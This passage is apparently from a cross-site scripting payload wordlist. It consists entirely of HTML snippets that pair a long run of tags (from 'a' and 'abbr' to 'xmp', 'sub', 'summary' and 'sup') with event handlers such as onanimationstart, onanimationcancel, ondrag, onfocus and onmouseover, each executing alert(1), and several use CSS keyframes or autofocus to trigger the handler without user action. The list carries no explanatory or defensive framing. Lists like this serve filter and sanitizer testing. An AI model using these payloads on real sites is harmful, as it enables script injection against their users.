style="position:absolute;" onanimationcancel="alert(1)"></tt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><u id=x style="position:absolute;" onanimationcancel="alert(1)"></u> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style="position:absolute;" onanimationcancel="alert(1)"></ul> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><var id=x style="position:absolute;" onanimationcancel="alert(1)"></var> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><video id=x style="position:absolute;" onanimationcancel="alert(1)"></video> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><wbr id=x style="position:absolute;" onanimationcancel="alert(1)"></wbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xmp id=x style="position:absolute;" onanimationcancel="alert(1)"></xmp> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationend="alert(1)"></abbr> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationstart="alert(1)"></abbr> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationend="alert(1)"></acronym> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationstart="alert(1)"></acronym> +<style>@keyframes x{}</style><address style="animation-name:x" onanimationend="alert(1)"></address> +<style>@keyframes x{}</style><address style="animation-name:x" onanimationstart="alert(1)"></address> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationend="alert(1)"></applet> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationstart="alert(1)"></applet> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationend="alert(1)"></area> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationstart="alert(1)"></area> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationend="alert(1)"></article> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationstart="alert(1)"></article> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationend="alert(1)"></aside> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationstart="alert(1)"></aside> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationend="alert(1)"></audio> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationstart="alert(1)"></audio> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationend="alert(1)"></b> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationstart="alert(1)"></b> +<style>@keyframes x{}</style><base style="animation-name:x" onanimationend="alert(1)"></base> +<style>@keyframes x{}</style><base style="animation-name:x" onanimationstart="alert(1)"></base> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationend="alert(1)"></basefont> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationstart="alert(1)"></basefont> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationend="alert(1)"></bdi> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationstart="alert(1)"></bdi> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationend="alert(1)"></bdo> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationstart="alert(1)"></bdo> +<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationend="alert(1)"></bgsound> +<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationstart="alert(1)"></bgsound> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationend="alert(1)"></big> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationstart="alert(1)"></big> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationend="alert(1)"></blink> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationstart="alert(1)"></blink> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationend="alert(1)"></blockquote> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationstart="alert(1)"></blockquote> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationend="alert(1)"></body> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationstart="alert(1)"></body> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationend="alert(1)"></br> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationstart="alert(1)"></br> +<style>@keyframes x{}</style><button style="animation-name:x" onanimationend="alert(1)"></button> +<style>@keyframes x{}</style><button style="animation-name:x" onanimationstart="alert(1)"></button> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationend="alert(1)"></canvas> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationstart="alert(1)"></canvas> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationend="alert(1)"></caption> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationstart="alert(1)"></caption> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationend="alert(1)"></center> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationstart="alert(1)"></center> +<style>@keyframes x{}</style><cite style="animation-name:x" onanimationend="alert(1)"></cite> +<style>@keyframes x{}</style><cite style="animation-name:x" onanimationstart="alert(1)"></cite> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationend="alert(1)"></code> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationstart="alert(1)"></code> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationend="alert(1)"></col> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationstart="alert(1)"></col> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationend="alert(1)"></colgroup> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationstart="alert(1)"></colgroup> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationend="alert(1)"></command> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationstart="alert(1)"></command> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationend="alert(1)"></content> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationstart="alert(1)"></content> +<style>@keyframes x{}</style><data style="animation-name:x" onanimationend="alert(1)"></data> +<style>@keyframes x{}</style><data style="animation-name:x" onanimationstart="alert(1)"></data> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationend="alert(1)"></datalist> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationstart="alert(1)"></datalist> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationend="alert(1)"></dd> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationstart="alert(1)"></dd> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationend="alert(1)"></del> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationstart="alert(1)"></del> +<style>@keyframes x{}</style><details style="animation-name:x" onanimationend="alert(1)"></details> +<style>@keyframes x{}</style><details style="animation-name:x" onanimationstart="alert(1)"></details> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationend="alert(1)"></dfn> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationstart="alert(1)"></dfn> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationend="alert(1)"></dialog> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationstart="alert(1)"></dialog> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationend="alert(1)"></dir> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationstart="alert(1)"></dir> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationend="alert(1)"></dl> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationstart="alert(1)"></dl> +<style>@keyframes x{}</style><dt style="animation-name:x" onanimationend="alert(1)"></dt> +<style>@keyframes x{}</style><dt style="animation-name:x" onanimationstart="alert(1)"></dt> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationend="alert(1)"></element> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationstart="alert(1)"></element> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationend="alert(1)"></em> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationstart="alert(1)"></em> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationend="alert(1)"></embed> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationstart="alert(1)"></embed> +<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationend="alert(1)"></fieldset> +<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationstart="alert(1)"></fieldset> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationend="alert(1)"></figcaption> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationstart="alert(1)"></figcaption> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationend="alert(1)"></figure> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationstart="alert(1)"></figure> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationend="alert(1)"></font> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationstart="alert(1)"></font> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationend="alert(1)"></footer> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationstart="alert(1)"></footer> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationend="alert(1)"></form> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationstart="alert(1)"></form> +<style>@keyframes x{}</style><frame style="animation-name:x" onanimationend="alert(1)"></frame> +<style>@keyframes x{}</style><frame style="animation-name:x" onanimationstart="alert(1)"></frame> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationend="alert(1)"></frameset> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationstart="alert(1)"></frameset> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationend="alert(1)"></h1> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationstart="alert(1)"></h1> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationend="alert(1)"></head> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationstart="alert(1)"></head> +<style>@keyframes x{}</style><header style="animation-name:x" onanimationend="alert(1)"></header> +<style>@keyframes x{}</style><header style="animation-name:x" onanimationstart="alert(1)"></header> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationend="alert(1)"></hgroup> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationstart="alert(1)"></hgroup> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationend="alert(1)"></hr> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationstart="alert(1)"></hr> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationend="alert(1)"></html> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationstart="alert(1)"></html> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationend="alert(1)"></i> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationstart="alert(1)"></i> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationend="alert(1)"></iframe> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationstart="alert(1)"></iframe> +<style>@keyframes x{}</style><image style="animation-name:x" onanimationend="alert(1)"></image> +<style>@keyframes x{}</style><image style="animation-name:x" onanimationstart="alert(1)"></image> +<style>@keyframes x{}</style><img style="animation-name:x" onanimationend="alert(1)"></img> +<style>@keyframes x{}</style><img style="animation-name:x" onanimationstart="alert(1)"></img> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationend="alert(1)"></input> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationstart="alert(1)"></input> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationend="alert(1)"></ins> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationstart="alert(1)"></ins> +<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationend="alert(1)"></isindex> +<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationstart="alert(1)"></isindex> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationend="alert(1)"></kbd> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationstart="alert(1)"></kbd> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationend="alert(1)"></keygen> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationstart="alert(1)"></keygen> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationend="alert(1)"></label> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationstart="alert(1)"></label> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationend="alert(1)"></legend> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationstart="alert(1)"></legend> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationend="alert(1)"></li> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationstart="alert(1)"></li> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationend="alert(1)"></link> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationstart="alert(1)"></link> +<style>@keyframes x{}</style><listing style="animation-name:x" onanimationend="alert(1)"></listing> +<style>@keyframes x{}</style><listing style="animation-name:x" onanimationstart="alert(1)"></listing> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationend="alert(1)"></main> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationstart="alert(1)"></main> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationend="alert(1)"></map> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationstart="alert(1)"></map> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationend="alert(1)"></mark> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationstart="alert(1)"></mark> +<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationend="alert(1)"></marquee> +<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationstart="alert(1)"></marquee> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationend="alert(1)"></menu> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationstart="alert(1)"></menu> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationend="alert(1)"></menuitem> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationstart="alert(1)"></menuitem> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationend="alert(1)"></meta> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationstart="alert(1)"></meta> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationend="alert(1)"></meter> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationstart="alert(1)"></meter> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationend="alert(1)"></multicol> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationstart="alert(1)"></multicol> +<style>@keyframes x{}</style><nav style="animation-name:x" onanimationend="alert(1)"></nav> +<style>@keyframes x{}</style><nav style="animation-name:x" onanimationstart="alert(1)"></nav> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationend="alert(1)"></nextid> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationstart="alert(1)"></nextid> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationend="alert(1)"></nobr> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationstart="alert(1)"></nobr> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationend="alert(1)"></noembed> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationstart="alert(1)"></noembed> +<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationend="alert(1)"></noframes> +<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationstart="alert(1)"></noframes> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationend="alert(1)"></noscript> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationstart="alert(1)"></noscript> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationend="alert(1)"></object> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationstart="alert(1)"></object> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationend="alert(1)"></ol> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationstart="alert(1)"></ol> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationend="alert(1)"></optgroup> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationstart="alert(1)"></optgroup> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationend="alert(1)"></option> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationstart="alert(1)"></option> +<style>@keyframes x{}</style><output style="animation-name:x" onanimationend="alert(1)"></output> +<style>@keyframes x{}</style><output style="animation-name:x" onanimationstart="alert(1)"></output> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationend="alert(1)"></p> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationstart="alert(1)"></p> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationend="alert(1)"></param> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationstart="alert(1)"></param> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationend="alert(1)"></picture> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationstart="alert(1)"></picture> +<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationend="alert(1)"></plaintext> +<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationstart="alert(1)"></plaintext> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationend="alert(1)"></pre> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationstart="alert(1)"></pre> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationend="alert(1)"></progress> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationstart="alert(1)"></progress> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationend="alert(1)"></q> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationstart="alert(1)"></q> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationend="alert(1)"></rb> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationstart="alert(1)"></rb> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationend="alert(1)"></rp> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationstart="alert(1)"></rp> +<style>@keyframes x{}</style><rt style="animation-name:x" onanimationend="alert(1)"></rt> +<style>@keyframes x{}</style><rt style="animation-name:x" onanimationstart="alert(1)"></rt> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationend="alert(1)"></rtc> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationstart="alert(1)"></rtc> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationend="alert(1)"></ruby> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationstart="alert(1)"></ruby> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationend="alert(1)"></s> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationstart="alert(1)"></s> +<style>@keyframes x{}</style><samp style="animation-name:x" onanimationend="alert(1)"></samp> +<style>@keyframes x{}</style><samp style="animation-name:x" onanimationstart="alert(1)"></samp> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationend="alert(1)"></script> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationstart="alert(1)"></script> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationend="alert(1)"></section> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationstart="alert(1)"></section> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationend="alert(1)"></select> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationstart="alert(1)"></select> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationend="alert(1)"></shadow> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationstart="alert(1)"></shadow> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationend="alert(1)"></slot> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationstart="alert(1)"></slot> +<style>@keyframes x{}</style><small style="animation-name:x" onanimationend="alert(1)"></small> +<style>@keyframes x{}</style><small style="animation-name:x" onanimationstart="alert(1)"></small> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationend="alert(1)"></source> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationstart="alert(1)"></source> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationend="alert(1)"></spacer> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationstart="alert(1)"></spacer> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationend="alert(1)"></span> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationstart="alert(1)"></span> +<style>@keyframes x{}</style><strike style="animation-name:x" onanimationend="alert(1)"></strike> +<style>@keyframes x{}</style><strike style="animation-name:x" onanimationstart="alert(1)"></strike> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationend="alert(1)"></strong> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationstart="alert(1)"></strong> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationend="alert(1)"></style> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationstart="alert(1)"></style> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationend="alert(1)"></sub> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationstart="alert(1)"></sub> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationend="alert(1)"></summary> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationstart="alert(1)"></summary> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationend="alert(1)"></sup> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationstart="alert(1)"></sup> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationend="alert(1)"></svg> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationstart="alert(1)"></svg> +<style>@keyframes x{}</style><table style="animation-name:x" onanimationend="alert(1)"></table> +<style>@keyframes x{}</style><table style="animation-name:x" onanimationstart="alert(1)"></table> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationend="alert(1)"></tbody> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationstart="alert(1)"></tbody> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationend="alert(1)"></td> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationstart="alert(1)"></td> +<style>@keyframes x{}</style><template style="animation-name:x" onanimationend="alert(1)"></template> +<style>@keyframes x{}</style><template style="animation-name:x" onanimationstart="alert(1)"></template> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationend="alert(1)"></textarea> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationstart="alert(1)"></textarea> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationend="alert(1)"></tfoot> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationstart="alert(1)"></tfoot> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationend="alert(1)"></th> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationstart="alert(1)"></th> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationend="alert(1)"></thead> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationstart="alert(1)"></thead> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationend="alert(1)"></time> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationstart="alert(1)"></time> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationend="alert(1)"></title> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationstart="alert(1)"></title> +<style>@keyframes x{}</style><tr style="animation-name:x" onanimationend="alert(1)"></tr> +<style>@keyframes x{}</style><tr style="animation-name:x" onanimationstart="alert(1)"></tr> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationend="alert(1)"></track> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationstart="alert(1)"></track> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationend="alert(1)"></tt> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationstart="alert(1)"></tt> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationend="alert(1)"></u> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationstart="alert(1)"></u> +<style>@keyframes x{}</style><ul style="animation-name:x" onanimationend="alert(1)"></ul> +<style>@keyframes x{}</style><ul style="animation-name:x" onanimationstart="alert(1)"></ul> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationend="alert(1)"></var> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationstart="alert(1)"></var> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="alert(1)"></video> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationstart="alert(1)"></video> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationend="alert(1)"></wbr> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationstart="alert(1)"></wbr> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationend="alert(1)"></xmp> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationstart="alert(1)"></xmp> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss> +<sub draggable="true" ondrag="alert(1)">test</sub> +<sub draggable="true" ondragend="alert(1)">test</sub> +<sub draggable="true" ondragenter="alert(1)">test</sub> +<sub draggable="true" ondragleave="alert(1)">test</sub> +<sub draggable="true" ondragstart="alert(1)">test</sub> +<sub id=x tabindex=1 onactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforeactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus> +<sub id=x tabindex=1 ondeactivate=alert(1)></sub><input id=y autofocus> +<sub id=x tabindex=1 onfocus=alert(1)></sub> +<sub id=x tabindex=1 onfocusin=alert(1)></sub> +<sub onbeforecopy="alert(1)" contenteditable>test</sub> +<sub onbeforecut="alert(1)" contenteditable>test</sub> +<sub onbeforepaste="alert(1)" contenteditable>test</sub> +<sub onblur=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onclick="alert(1)">test</sub> +<sub oncontextmenu="alert(1)">test</sub> +<sub oncopy="alert(1)" contenteditable>test</sub> +<sub oncut="alert(1)" contenteditable>test</sub> +<sub ondblclick="alert(1)">test</sub> +<sub onfocusout=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onkeydown="alert(1)" contenteditable>test</sub> +<sub onkeypress="alert(1)" contenteditable>test</sub> +<sub onkeyup="alert(1)" contenteditable>test</sub> +<sub onmousedown="alert(1)">test</sub> +<sub onmouseenter="alert(1)">test</sub> +<sub onmouseleave="alert(1)">test</sub> +<sub onmousemove="alert(1)">test</sub> +<sub onmouseout="alert(1)">test</sub> +<sub onmouseover="alert(1)">test</sub> +<sub onmouseup="alert(1)">test</sub> +<sub onpaste="alert(1)" contenteditable>test</sub> +<summary draggable="true" ondrag="alert(1)">test</summary> +<summary draggable="true" ondragend="alert(1)">test</summary> +<summary draggable="true" ondragenter="alert(1)">test</summary> +<summary draggable="true" ondragleave="alert(1)">test</summary> +<summary draggable="true" ondragstart="alert(1)">test</summary> +<summary id=x tabindex=1 onactivate=alert(1)></summary> +<summary id=x tabindex=1 onbeforeactivate=alert(1)></summary> +<summary id=x tabindex=1 onbeforedeactivate=alert(1)></summary><input autofocus> +<summary id=x tabindex=1 ondeactivate=alert(1)></summary><input id=y autofocus> +<summary id=x tabindex=1 onfocus=alert(1)></summary> +<summary id=x tabindex=1 onfocusin=alert(1)></summary> +<summary onbeforecopy="alert(1)" contenteditable>test</summary> +<summary onbeforecut="alert(1)" contenteditable>test</summary> +<summary onbeforepaste="alert(1)" contenteditable>test</summary> +<summary onblur=alert(1) tabindex=1 id=x></summary><input autofocus> +<summary onclick="alert(1)">test</summary> +<summary oncontextmenu="alert(1)">test</summary> +<summary oncopy="alert(1)" contenteditable>test</summary> +<summary oncut="alert(1)" contenteditable>test</summary> +<summary ondblclick="alert(1)">test</summary> +<summary onfocusout=alert(1) tabindex=1 id=x></summary><input autofocus> +<summary onkeydown="alert(1)" contenteditable>test</summary> +<summary onkeypress="alert(1)" contenteditable>test</summary> +<summary onkeyup="alert(1)" contenteditable>test</summary> +<summary onmousedown="alert(1)">test</summary> +<summary onmouseenter="alert(1)">test</summary> +<summary onmouseleave="alert(1)">test</summary> +<summary onmousemove="alert(1)">test</summary> +<summary onmouseout="alert(1)">test</summary> +<summary onmouseover="alert(1)">test</summary> +<summary onmouseup="alert(1)">test</summary> +<summary onpaste="alert(1)" contenteditable>test</summary> +<sup draggable="true" ondrag="alert(1)">test</sup> +<sup draggable="true" ondragend="alert(1)">test</sup> +<sup draggable="true" ondragenter="alert(1)">test</sup> +<sup draggable="true" ondragleave="alert(1)">test</sup> +<sup draggable="true" ondragstart="alert(1)">test</sup> +<sup id=x tabindex=1 onactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforeactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforedeactivate=alert(1)></sup><input autofocus> +<sup id=x tabindex=1 ondeactivate=alert(1)></sup><input id=y autofocus> +<sup id=x tabindex=1 onfocus=alert(1)></sup> +<sup id=x tabindex=1 onfocusin=alert(1)></sup> +<sup onbeforecopy="alert(1)" contenteditable>test</sup> +<sup onbeforecut="alert(1)" contenteditable>test</sup> +<sup onbeforepaste="alert(1)" contenteditable>test</sup> +<sup onblur=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onclick="alert(1)">test</sup> +<sup oncontextmenu="alert(1)">test</sup> +<sup oncopy="alert(1)" contenteditable>test</sup> +<sup oncut="alert(1)" contenteditable>test</sup> +<sup ondblclick="alert(1)">test</sup> +<sup onfocusout=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onkeydown="alert(1)" contenteditable>test</sup> +<sup onkeypress="alert(1)" contenteditable>test</sup> +<sup onkeyup="alert(1)" contenteditable>test</sup> +<sup onmousedown="alert(1)">test</sup> +<sup 